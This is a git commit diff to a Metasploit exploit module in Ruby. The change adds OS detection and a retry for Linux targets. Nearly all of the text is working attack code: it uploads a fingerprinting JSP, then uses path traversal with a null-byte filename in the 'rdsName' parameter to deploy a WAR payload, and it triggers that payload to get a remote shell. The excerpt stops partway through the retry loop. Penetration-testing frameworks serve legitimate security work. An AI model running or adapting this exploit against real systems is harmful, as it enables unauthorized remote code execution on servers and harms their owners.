Fix Linux target by trying again if exploit fails

MS-2855/keylogger-mettle-extension
Pedro Ribeiro 2015-07-18 20:12:13 +01:00
parent 2ce00d2239
commit 7483e77bba
1 changed files with 78 additions and 25 deletions

View File

@ -77,16 +77,64 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def pick_target
app_base = rand_text_alphanumeric(4 + rand(32 - 4)) unless target.name == 'Automatic'
tomcat_path = '../../../../' return target
servlet_path = 'rdslogs' end
print_status("#{peer} - Determining target")
os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
url = upload_payload(os_finder_payload, false)
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], url),
'method' => 'GET',
'cookie' => @cookie,
'headers' => { 'Referer' => Rex::Text.rand_text_alpha(10 + rand(10)) }
})
if res && res.code == 200
if res.body.to_s =~ /Linux/
register_files_for_cleanup('webapps/' + url)
return targets[1]
elsif res.body.to_s =~ /Windows/
register_files_for_cleanup('root/' + url)
return targets[2]
end
end
nil
end
def send_payload(war_payload, tomcat_path, app_base)
# We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail
print_status("#{peer} - Uploading WAR file...")
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'),
'method' => 'POST',
'data' => Zlib::Deflate.deflate(war_payload),
'ctype' => 'application/octet-stream',
'vars_get' => {
'rdsName' => "../../../../#{tomcat_path}#{app_base}.war\x00"
}
})
# The server either returns a 200 OK when the upload is successful.
if res && res.code == 200
print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
else
fail_with(Failure::Unknown, "#{peer} - WAR upload failed")
end
end
def exploit
# We need to create the upload directories before our first attempt to upload the WAR. # We need to create the upload directories before our first attempt to upload the WAR.
print_status("#{peer} - Creating upload directory") print_status("#{peer} - Creating upload directory")
bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
send_request_cgi({ send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), 'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'),
'method' => 'POST', 'method' => 'POST',
'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))), 'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))),
'ctype' => 'application/xml', 'ctype' => 'application/xml',
@ -95,27 +143,32 @@ class Metasploit3 < Msf::Exploit::Remote
} }
}) })
app_base = rand_text_alphanumeric(4 + rand(32 - 4))
war_payload = payload.encoded_war({ :app_name => app_base }).to_s war_payload = payload.encoded_war({ :app_name => app_base }).to_s
# We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail send_payload(war_payload, 'tomcat/webapps/', app_base)
print_status("#{peer} - Uploading WAR file...")
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
'method' => 'POST',
'data' => Zlib::Deflate.deflate(war_payload),
'ctype' => 'application/octet-stream',
'vars_get' => {
'rdsName' => "#{tomcat_path}/tomcat/webapps/#{app_base}.war\x00"
}
})
# The server either returns a 200 OK when the upload is successful.
if res && res.code == 200
print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
register_files_for_cleanup("tomcat/webapps/#{app_base}.war") register_files_for_cleanup("tomcat/webapps/#{app_base}.war")
else
fail_with(Failure::Unknown, "#{peer} - WAR upload failed") 10.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi({
'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
break if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end end
print_error("#{peer} - Failed to launch payload. Trying one last time with a different path...")
# OK this might be a Linux server, it's a different traversal path.
# Let's try again...
send_payload(war_payload, '', app_base)
register_files_for_cleanup("webapps/#{app_base}.war")
10.times do 10.times do
select(nil, nil, nil, 2) select(nil, nil, nil, 2)